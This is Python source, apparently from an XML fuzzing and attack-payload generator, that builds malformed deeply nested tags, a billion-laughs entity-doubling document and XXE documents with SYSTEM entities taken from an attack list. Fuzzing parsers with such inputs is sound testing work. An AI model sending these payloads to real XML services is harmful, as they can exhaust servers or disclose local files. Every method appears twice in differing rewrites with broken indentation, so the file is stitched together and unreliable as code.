def generateXMLGarbage(self):
    """Register two oversized XML fragments as parser-robustness test inputs.

    Both fragments start with one element carrying 101 attributes that are
    all named ``a``, followed by 21 nested opening tags of the same random
    name.  The first fragment stops there, with nothing closed.  The second
    continues with a random payload, a newline and the matching closing
    tags.  Each is handed to ``self.addstring`` under the ``'tags'``
    category.

    Because the attribute name repeats, neither fragment is well-formed
    XML; a conforming parser is expected to reject both cleanly.
    """
    # NOTE(review): genRandom is defined elsewhere; with b64=True it
    # presumably returns base64 text, which may contain characters that
    # are not legal in an XML name. Confirm against attackUtils.
    payload = attackUtils.genRandom(100, b64=True)
    tag = attackUtils.genRandom(30, b64=True)

    # 101 attributes, a="0" through a="100", every one named "a".
    attrs = ''.join(" a=\"%d\"" % n for n in range(101))
    open_run = ('<%s>' % tag) * 21
    close_run = ('</%s>' % tag) * 21

    # Fragment 1: deep nesting that is never closed.
    unterminated = ('<%s' % tag) + attrs + '>' + open_run
    self.addstring(unterminated, 'tags')

    # Fragment 2: the same prefix, then payload and all closing tags.
    complete = unterminated + payload + '\n' + close_run + ('</%s>' % tag)
    self.addstring(complete, 'tags')
    def generateXMLGarbage(self):
        """Queue an unterminated and a terminated deeply nested XML fragment.

        The shared prefix is a root element with 101 attributes (all named
        ``a``, so the markup is not well-formed) followed by 21 nested
        opening tags.  The prefix alone is registered first.  It is then
        extended with random filler, a newline and 22 closing tags (21 for
        the nested elements plus one for the root) and registered again.
        Both go to ``self.addstring`` with the ``'tags'`` category.

        These inputs check that an XML consumer rejects malformed, heavily
        nested markup without exhausting resources.
        """
        # genRandom lives in attackUtils (not shown here); the call order is
        # kept in case the generator is seeded.
        filler = attackUtils.genRandom(100, b64=True)
        tag_name = attackUtils.genRandom(30, b64=True)
        opener = '<%s>' % tag_name
        closer = '</%s>' % tag_name

        pieces = ['<%s' % tag_name]
        pieces.extend(" a=\"%d\"" % idx for idx in range(101))
        pieces.append('>')
        pieces.extend([opener] * 21)
        # Incomplete set of tags: nothing has been closed yet.
        self.addstring(''.join(pieces), 'tags')

        pieces.extend([filler, '\n'])
        pieces.extend([closer] * 22)
        # Complete set: every opened element, including the root, is closed.
        self.addstring(''.join(pieces), 'tags')
 def __init__(self):
     """Create empty result containers, load tags, and pre-generate fillers.

     ``self.getTags()`` is defined elsewhere and runs once both containers
     exist.  Five random strings of fixed sizes are then stored on the
     instance for later use by the generator methods.
     """
     self.wssecurity, self.xml = [], {}
     # NOTE(review): getTags presumably fills the containers above; confirm.
     self.getTags()

     # Attribute name -> size passed to genRandom.  The order matches the
     # original assignments in case the generator is seeded.
     filler_sizes = (
         ('rnd', 300),
         ('rndUser', 300),
         ('rndPass', 300),
         ('rnd3', 3000),
         ('rnd6', 6000),
     )
     for attr_name, size in filler_sizes:
         setattr(self, attr_name, attackUtils.genRandom(size, b64=True))
 def __init__(self):
     """Initialise the generator's state.

     Sets up an empty ``wssecurity`` list and ``xml`` dict, calls
     ``self.getTags()`` (defined elsewhere), and stores five random filler
     strings requested from ``attackUtils.genRandom`` with ``b64=True``.
     """
     def _filler(size):
         # Single place for the shared b64=True keyword argument.
         return attackUtils.genRandom(size, b64=True)

     self.wssecurity = list()
     self.xml = dict()
     self.getTags()

     # Three 300-unit values: one generic, two named for user and password.
     self.rnd = _filler(300)
     self.rndUser = _filler(300)
     self.rndPass = _filler(300)
     # Larger fillers for size-related test cases.
     self.rnd3 = _filler(3000)
     self.rnd6 = _filler(6000)
    def generateGenericXXE(self, val=101):
        """Register a nested-entity document as an entity-expansion test input.

        The DTD defines ``x0`` as a random string and then ``x1`` through
        ``x(val-1)``, each made of two references to the previous entity.
        The body references the last entity, so a parser that expands
        entities without a limit would grow the text to ``2 ** (val - 1)``
        copies of ``x0``.  Despite the method name, only internal entities
        are used; no external resource is referenced.

        Parsers that refuse DTDs or cap entity expansion should reject the
        document quickly, which is what this input is meant to verify.

        Args:
            val: One more than the index of the last entity defined.

        The buffer object itself (not its string value) is passed to
        ``self.addstring`` with the ``'entity'`` category.
        """
        base_text = attackUtils.genRandom(100, b64=True)
        root = attackUtils.genRandom(30, b64=True)
        doc = StringIO()
        emit = doc.write

        # self.xml["xh"] is set elsewhere (presumably the XML header).
        emit(self.xml["xh"])
        emit('<!DOCTYPE %s [<!ENTITY x0 \"' % root)
        emit(base_text)
        emit('\">')

        # Entity N is defined as two references to entity N-1.
        for prev in range(val - 1):
            emit('<!ENTITY x%s \"&x%s;&x%s;\">' % (prev + 1, prev, prev))

        emit(']>')
        last = val - 1
        emit('<%s>&x%d;</%s>' % (root, last, root))

        self.addstring(doc, 'entity')
    def generateGenericXXE(self, val=101):
        """Build a doubling entity chain and queue it under ``'entity'``.

        Layout of the generated document: the stored header
        ``self.xml["xh"]``, a DOCTYPE whose internal subset declares ``x0``
        (random text) and ``val - 1`` further entities that each reference
        their predecessor twice, then a single root element whose content
        is a reference to the last entity.

        The input checks that the XML parser under test bounds or disables
        entity expansion.  Unbounded expansion doubles the text at every
        level.

        Args:
            val: Upper bound (exclusive) of the entity indices declared.
        """
        rnd = attackUtils.genRandom(100, b64=True)
        rnd_tag = attackUtils.genRandom(30, b64=True)
        doc = StringIO()

        # Header, DOCTYPE opening and the base entity x0.
        prologue = (
            self.xml["xh"],
            '<!DOCTYPE %s [<!ENTITY x0 \"' % rnd_tag,
            rnd,
            '\">',
        )
        for part in prologue:
            doc.write(part)

        # Each further entity is two references to the one before it.
        level = 1
        while level < val:
            below = level - 1
            doc.write('<!ENTITY x%s \"&x%s;&x%s;\">' % (level, below, below))
            level += 1

        doc.write(']>')
        doc.write('<%s>&x%d;</%s>' % (rnd_tag, val - 1, rnd_tag))

        # The StringIO object itself is what addstring receives.
        self.addstring(doc, 'entity')
    def generateOSXXE(self):
        """Register one external-entity test document per ``self.attacks`` entry.

        For each entry a document is built from the stored header, a DOCTYPE
        declaring a ``SYSTEM`` entity named ``xxe`` whose identifier is the
        entry, and a root element that references the entity.  Each buffer
        is passed to ``self.addstring`` with the ``'entity'`` category.

        A parser with external-entity resolution disabled will not
        dereference the identifier, which is the behaviour these inputs
        are meant to confirm.
        """
        # NOTE(review): self.attacks is populated elsewhere; each entry is
        # interpolated verbatim into a double-quoted literal, so an entry
        # containing '"' would break the declaration. Confirm the list.
        for system_id in self.attacks:
            # A fresh random root name is drawn for every document.
            root = attackUtils.genRandom(30, b64=True)
            doc = StringIO()
            emit = doc.write

            emit(self.xml["xh"])
            emit('<!DOCTYPE %s [' % root)
            emit('<!ELEMENT %s ANY>' % root)
            emit('<!ENTITY xxe SYSTEM \"%s\">' % system_id)
            emit(']>')
            emit('<%s>&xxe;</%s>' % (root, root))

            self.addstring(doc, 'entity')
    def generateOSXXE(self):
        """Queue external-entity documents built from ``self.attacks``.

        Every entry of ``self.attacks`` (defined elsewhere) becomes the
        system identifier of an ``xxe`` entity declared in the DOCTYPE.
        The root element, whose name is random per document, contains a
        single reference to that entity.  The resulting buffer object is
        handed to ``self.addstring`` under ``'entity'``.

        The inputs verify that the target parser refuses or ignores
        external entities.
        """
        for attack in self.attacks:
            rnd_tag = attackUtils.genRandom(30, b64=True)
            doc = StringIO()

            # The fragments are written in document order; the entry is
            # inserted as-is, without escaping.
            fragments = (
                self.xml["xh"],
                '<!DOCTYPE %s [' % rnd_tag,
                '<!ELEMENT %s ANY>' % rnd_tag,
                '<!ENTITY xxe SYSTEM \"%s\">' % attack,
                ']>',
                '<%s>&xxe;</%s>' % (rnd_tag, rnd_tag),
            )
            for fragment in fragments:
                doc.write(fragment)

            self.addstring(doc, 'entity')
    def generateTagAttacks(self, param):
        """Feed three tag shapes built from *param* to ``generateXMLFuzzData``.

        The shapes are, in order: the opening tag alone, a complete element
        wrapping a random payload, and the closing tag alone.  Each is
        passed to ``self.generateXMLFuzzData`` (defined elsewhere) with the
        constants ``256`` and ``64`` and the ``'tags'`` category.

        Args:
            param: Element name.  It is concatenated into the markup as-is,
                without escaping or validation.
        """
        payload = attackUtils.genRandom(200, b64=True)

        opening = '<' + param + '>'
        closing = '</' + param + '>'

        # Opening tags only; the element is never closed.
        self.generateXMLFuzzData(opening, 256, 64, 'tags')

        # A balanced element around the random payload.
        self.generateXMLFuzzData(opening + ('%s' % payload) + closing,
                                 256, 64, 'tags')

        # Closing tags only; nothing was opened.
        self.generateXMLFuzzData(closing, 256, 64, 'tags')
    def generateTagAttacks(self, param):
        """Generate open-only, balanced and close-only tag test data.

        Three strings are derived from *param* and each is handed to
        ``self.generateXMLFuzzData`` with the arguments ``256, 64, 'tags'``.
        What those two numbers control is defined by that method, which is
        not shown here.

        Args:
            param: Tag name used verbatim in the generated markup.
        """
        rnd = attackUtils.genRandom(200, b64=True)

        # (description, markup) pairs in the order they are submitted.
        variants = (
            ('open tags only', ''.join(['<', param, '>'])),
            ('complete element',
             ''.join(['<', param, '>', '%s</' % rnd, param, '>'])),
            ('close tags only', '</' + param + '>'),
        )
        for _description, markup in variants:
            self.generateXMLFuzzData(markup, 256, 64, 'tags')